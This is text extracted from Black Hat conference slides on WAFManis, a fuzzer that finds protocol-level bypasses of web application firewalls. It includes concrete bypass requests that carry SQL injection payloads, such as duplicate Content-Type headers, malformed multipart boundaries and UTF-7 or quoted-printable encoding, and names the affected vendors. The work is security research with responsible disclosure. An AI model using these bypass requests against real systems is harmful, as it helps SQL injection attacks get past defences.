Qi Wang & Jianjun Chen & Run Guo & Chao Zhang & Haixin Duan_Break the Wall from Bottom Automated Discovery of Protocol-Level Evasion Vulnerabilities in Web Application Firewalls.pdf

《Qi Wang & Jianjun Chen & Run Guo & Chao Zhang & Haixin Duan_Break the Wall from Bottom Automated Discovery of Protocol-Level Evasion Vulnerabilities in Web Application Firewalls.pdf》由會員分享，可在線閱讀，更多相關《Qi Wang & Jianjun Chen & Run Guo & Chao Zhang & Haixin Duan_Break the Wall from Bottom Automated Discovery of Protocol-Level Evasion Vulnerabilities in Web Application Firewalls.pdf（50頁珍藏版）》請在三個皮匠報告上搜索。

1、#BHUSA BlackHatEventsBreak the Wall from Bottom:Automated Discovery of Protocol-Level Evasion Vulnerabilities in Web Application FirewallsSpeaker:Qi Wang(Eki)Contributors:Jianjun Chen,Run Guo,Chao Zhang,Haixin Duan#BHUSA BlackHatEvents2Talk RoadmapvWhat are WAFs and how do they work?vHow do we disco

2、ver new evasion cases automatically?vHow to bypass WAF at the protocol-level like a Pro?vBonus:Three useful tactics to bypass WAFs at the protocol-level#BHUSA BlackHatEvents3WebApps Security RiskvWebApp uses parameters in HTTP request messages as user inputsvMalicious user inputs can hijack the cont

3、rol flow of the WebAppA code snippet from a PHP WebApp with SQL injection vulnerability?id=0 union select*from secret#BHUSA BlackHatEvents4How WAF Protect WebApp from Security Risk?vWAFs monitor WebApp traffic to block malicious HTTP requestsVirtual Patch:protect the WebApp before the developers rel

4、ease the patch.?id=0 union select*from secret UserAttackerWebAppWAF#BHUSA BlackHatEvents5The never-ending battle between hackers and WAFsvCloudflare research*shows lots of activity since Log4jShellHackers have been looking for ways to bypass WAFAfter$jdni got blocked,the hackers applied encoding met

5、hods&log4j features*https:/ BlackHatEvents6The Working Principle of WAFsvParse-Match-ApplyAttackerWebAppGET/HTTP/1.1Content-Type:application/json”id”:”1or(1=1)#”Deny requestARGS:Key:id Value:1or(1=1)#WAF ParsingARGS contains or(1=1)#denyVariableOperatorActionWont send to server Matching#BHUSA BlackH

6、atEvents7Wait a minute？Looks like a weak rule！vJust change the case of keywords and use instead of=vNow you find payload-level evasion tacticsAttackerWebAppGET/HTTP/1.1Content-Type:application/json“id”:“1Or(10)#”Response with leaked dataARGS:Key:id Value:1Or(10)#WAFParsingARGS contains or(1=1)#denyF

7、orward SQLi Request#BHUSA BlackHatEvents8What if the rules become Insane？vVendors can configure their rules and only allow number values.AttackerWebAppGET/HTTP/1.1Content-Type:application/json“id”:“1Or(0)#”ARGS:Key:id Value:1Or(10)#WAFParsingARGS contains 0-9 denyWont forwarded to server#BHUSA Black

8、HatEvents9Now the magic time!vJust change the content-type to application/x-whatever+jsonAttackerWebAppGET/HTTP/1.1Content-Type:application/x-whatever+json“id”:“1or(1=1)#”ARGS:Key:None Value:NoneWAFParsingARGS:Key:idValue:1or(1=1)#Response with leaked dataARGS contains 0-9 deny#BHUSA BlackHatEvents1

9、0Now the magic time!vJust change the content-type into application/x-whatever+jsonWAF wont recognize x-whatever+json as json bodyWebApp match application/*+json and still parse it as jsonWAF#BHUSA BlackHatEvents11Different parsers allows protocol-level evasionvBuilt-in parser,behavior may be differe

10、nt from each othervDevelopers get parameters through higher interfaces like$_GETvHowever,the WAF knows nothing about these interfaces WebApp AWAFWebAppBWebAppCHey bros,I think the parameter is WReally?I think it is XNo,it is definitely YIsnt there two parameters?#BHUSA BlackHatEvents12Payload-level

11、VS Protocol-levelvPayload:Craft payload that is not in the rules of WAFLimited to one specific vulnerability type:SQLi,XSS,Quickly fixed by updating rulesRelated workAutoSpear Blackhat Asia 22Mutation-guide SQLi payload generator with Monte Carlo algorithmWAF-A-Mole SAC 20Generate SQLi payload throu

12、gh adversarial machine learning#BHUSA BlackHatEvents13Payload-level VS Protocol-levelvPayload:Craft payload not in the rules of WAFLimited to one specific vulnerability type:SQLi,XSS,Quickly fixed by updating rulesvProtocol:Leverage different parsing behavior between WAF&WebAppCan be utilized to loa

13、d arbitrary attack vectors including SQLi,XSS,Works well even if the WAF has strict rules at payload-levelRelated works:Protocol-Level Evasion of Web Application Firewalls Blackhat USA 12 still many new casesOur Focus#BHUSA BlackHatEvents14There are so many“parameters”in HTTPvWebApps consume paramet

14、ers in HTTP request messagesPath parameters/users/idQuery parameters?role=admin&id=1Header parametersX-MyHeader:ValueCookie parametersCookie:debug=0;session=aaa;Body parametersx-www-form-urlencoded:a=1&b=2Json“a”:”1”Multipart/data XMLhttps:/swagger.io/docs/specification/describing-parameters/#BHUSA

15、BlackHatEvents15How to systematically and efficiently mine for protocol-level evasion cases in WAFs?#BHUSA BlackHatEvents16WAFManis:An Evasion Fuzzing FrameworkvGrammar Guided and Code Coverage Drivenhttps:/ BlackHatEventsDemo Video#BHUSA BlackHatEvents#BHUSA BlackHatEventsChallenges we addressed#BH

16、USA BlackHatEvents20How to generate high quality test-inputs?vLegacy FuzzerPut raw HTTP requests in the corpusMutate with raw bytesMost of the test-inputs are invalid or payload-missingGET/HTTP/1.1Content-Type:application/json”id”:”1Or(10)#”GT/HTTP/1.1Conten:POST”id”:”1Or(10)#”id”:”1r(10)#”GT/HTTP/1

17、.1Content-Type:application/json”id”:”#BHUSA BlackHatEvents21WAFManis:GeneratorvGenerate initial inputs with HTTP GrammarExtract grammar from the RFCsBuild the request from the root nodeDump the corresponding HTTP request when executing-boundaryContent-Disposition:form-data;name=id;1 union select pas

18、sword from users limit 1-boundary-RFC7230RFC7578RFC2231bodydash-boundary body-partclosing boundary-boundary-boundary-MIME-headersbody-value#BHUSA BlackHatEvents22WAFManis:MutatorvDirected mutationGrammar-level:duplicate or delete non-leaf nodesByte-level:delete or add a single byte in leaf nodes or

19、encode leaf nodes.Specifically,do not delete or add bytes to the payloadbodydash-boundary body-partclosing boundary-boundary-boundary-MIME-headersbody-valuebody-partContent-Disposition:form-data;name=id;1 union select password from users limit 1-Content-Disposition:form-data;name=id;1 union select p

20、assword from users limit 1-boundary-#BHUSA BlackHatEvents23How to get an effective feedback?vBlack-box FuzzerGenerate test-inputs blindly,which is inefficientvGrey-box FuzzerGuide the fuzzing process with target code coverage feedback,e.g.AFLHowever,commercial WAFs are closed-source without code or

21、binary#BHUSA BlackHatEvents24How to get an effective feedback?vUtilize code coverage of open-source HTTP parsers to guide testingBoth parsers are implemented to parse HTTP requests with similar logicThe more feature branches we covered,the more differences we found#BHUSA BlackHatEvents25How to detec

22、t successful evasion automatically?vLegacy fuzzersRely on program exceptions,such as crashes or hangsvProtocol-level WAF evasionsSilent and wont trigger crashes.Requests are benign at WAF Side while harmful at WebApp SideWAF may modify original request message#BHUSA BlackHatEvents26WAFManis:Validato

23、rvWeb ValidatorReturn all parsed parametersIndicate how WebApp parses HTTP requests.Test Target in the fuzzing processapp.route(/,methods=GET,POST,)def parse1():return(dumps(args:flask.request.args,form:flask.request.form,json:flask.request.json if flask.request.is_json else None),APP_S,(Content-Typ

24、e,application/json)#BHUSA BlackHatEvents27WAFManis:ValidatorvWAF Validator：Return with SWAF_PASS and the exact HTTP requestQuickly know which request passedGet the exact forwarding request to learn how WAFs will modify the request#BHUSA BlackHatEvents28WAFManis:Validatorv2-Step-Validation：WAFs may m

25、odify the original requests,WAF Validator saves the request samples Sends the samples to WebApp for 2ndvalidation.#BHUSA BlackHatEvents29Too many duplicate cases:-(vThere are too many“optional”fields in the HTTP messageMany successful evasion cases look different but the sameGET/HTTP/1.1Content-Type

26、:application/x-ajson”id”:”1Or(10)#”GET/HTTP/1.1Content-Type:application/x-ajson;c=1”id”:”1Or(10)#”GET/HTTP/1.1Content-Type:application/x-ajson;a=2”id”:”1Or(10)#”GET/HTTP/1.1Content-Type:application/x-ajson;”id”:”1Or(10)#”#BHUSA BlackHatEvents30WAFManis:CentrifugevMinimize and re-verify evasionRemovi

27、ng useless nodes iteratively.Avoid redundant mutation and help find unique samples.2-Step Verification to exclude false positive samples.WAF ValidatorCentrifugeWebApp Validator2.Bypassed1.Delete node3.Replay real request 4.Parsed correctly#BHUSA BlackHatEventsTalk is cheap,Look at what we found!#BHU

28、SA BlackHatEvents32Evaluation SetupvWebApp FrameworkTop 20 Popular OSS WebApp FrameworksvWAF:8 Commercial WAF:Selected by global market share report 6 Open-source WAFSelected by“WAF”topic on GitHub#BHUSA BlackHatEvents33What did we find？vAll tested web frameworks accept some non-regular requestsvMos

29、t WAFs can be easily bypassed with specific HTTP requests1.Affected web framework indicates the influence of all bypass use cases for corresponding WAF#BHUSA BlackHatEventsTactics-1:Parameter Type ConfusionFirst of all,the WAF needs to choose correct parser#BHUSA BlackHatEvents35Tactics-1:Parameter

30、Type ConfusionvCase 1:Multiple Content-TypeFlask uses the last Content-Type header to indicate body type,ModSecurity resolves the first header35Flask AppPOST/HTTP/1.1Content-Type:application/xmlContent-Type:application/x-www-form-urlencodedResponse with leaked dataARGS:Key:None Value:NoneNginx&Modes

31、urityParsingARGS:Key:idValue:1or(1=1)#is xmlis url params#BHUSA BlackHatEvents36Tactics-1:Parameter Type ConfusionvCase 1:Multiple Content-TypeFlask(Python)uses a dictionary to store HTTP headers#BHUSA BlackHatEvents37Tactics-1:Parameter Type ConfusionvCase 2:Fake file parameterWAF wont apply SQLi r

32、ule to file parameterThe WAF parser thinks it is a file because there is only one header and there is a filename parameter,while PHP parses it as normal parameters37PHP-based App-aContent-Disposition:form-data;name=id;rrContent-Transfer-Encoding:filename=1or(1=1)#-aResponse with leaked dataFile:file

33、name:“”Content:1or(1=1)#Alibaba Cloud WAFParsingARGS:Key:idValue:1or(1=1)#is a fileIs a param#BHUSA BlackHatEventsTactics-2:Malformed ParameterWhere WAFs Fail,WebApps Succeed#BHUSA BlackHatEvents39Tactics-2:Malformed ParametervCase 3:Malformed Boundary ParameterThe attacker crafted a boundary parame

34、ter with a quote.Cloudflare WAF could not parse it correctly3939WebAppContent-Type:multipart/form-data;boundary=“a”;-aContent-Disposition:form-data;name=id;1or(1=1)#-aboundary:“a”ARGS:Key:None Value:NoneCloudflare WAFParsingboundary:aARGS:Key:idValue:1or(1=1)#Keep quoteRemove quoteResponse with leak

35、ed data#BHUSA BlackHatEvents40Tactics-2:Malformed ParametervCase 4:Malformed Boundary SeparatorThe attacker crafted an in-complete boundary separatorFortinet WAF could not parse it correctlyPHP tolerated the in-complete structure and parsed SQLi payload.4040PHP-based WebAppPOST/HTTP/1.1Content-Type:

36、multipart/form-data;boundary=a;-aContent-Disposition:form-data;name=id;1or(1=1)#-a-ARGS:Key:None Value:NoneFortinetWAFParsingARGS:Key:idValue:1or(1=1)#failuretolerateResponse with leaked data#BHUSA BlackHatEvents41Tactics-2:Malformed ParametervBonus:The smallest body that PHP can tolerate as valid m

37、ultipart#BHUSA BlackHatEventsTactics-3:RFC Support GapWAF is MAD?Try WebApp dialects!#BHUSA BlackHatEvents43Tactics-3:RFC Support GapvCase 5:Deprecated CTE headerIn RFC 7578,the recommendation was deprecated and senders SHOULD NOT generate any parts with a Content-Transfer-Encoding header field.Howe

38、ver,Go-base WebApps support it434343Go-based App.-boundaryContent-Disposition:form-data;name=id;Content-Transfer-Encoding:quoted-printable=31=27=6f=72=28=31=29=23-boundaryARGS:Key:idValue:=31=27.Google Cloud ArmorParsingARGS:Key:idValue:1or(1=1)#no-decodedecodeResponse with leaked data#BHUSA BlackHa

39、tEvents44Tactics-3:RFC Support GapvCase 5:Deprecated CTE headerThe MIME library of Go SDK still supports Content-Transfer-Encoding#BHUSA BlackHatEvents45Tactics-3:RFC Support GapvCase 6:Charset SupportAccording to RFC 1866,application/x-www-form-urlencoded has no“charset”Most WAF ignored this parame

40、ter for this MIME type,but Django will parse it.454545Django AppPOST/HTTP/1.1Content-Type:application/x-www-form-urlencoded;charset=utf-7;+AGkAZA-=+ADEAJwBvAHIAKAAxACkAIw-ARGS:Key:+AGkAValue:+ADE.Azure WAFParsingARGS:Key:idValue:1or(1=1)#no-decodedecodeResponse with leaked data#BHUSA BlackHatEvents4

41、6Tactics-3:RFC Support GapvCase 6:Charset SupportUnexpected featured support in Django(Fixed in ver.5.0)#BHUSA BlackHatEvents47WAF affected by Three TacticsFound 311evasion samplesacross 14x20WAF and WebAppCombinations#BHUSA BlackHatEvents48Responsible DisclosurevResponse from affected WAF and WebAp

42、p VendorsFixedConfirmed11 vendors9 vendors8 vendorsReceived#BHUSA BlackHatEvents49Black Hat Sound BytesvParsing parameters give WAFs visibility but also create a vulnerabilityvWe shared a new framework:WAFManis*Automated CGF tool of protocol-level WAF evasionsvThree tactics in payload-level WAF evasionParameter Type Confusion Malformed ParameterRFC Support Gap*:https:/ BlackHatEventsThanks for listening!Any questions?Qi Wang,Tsinghua UniversityPaperTool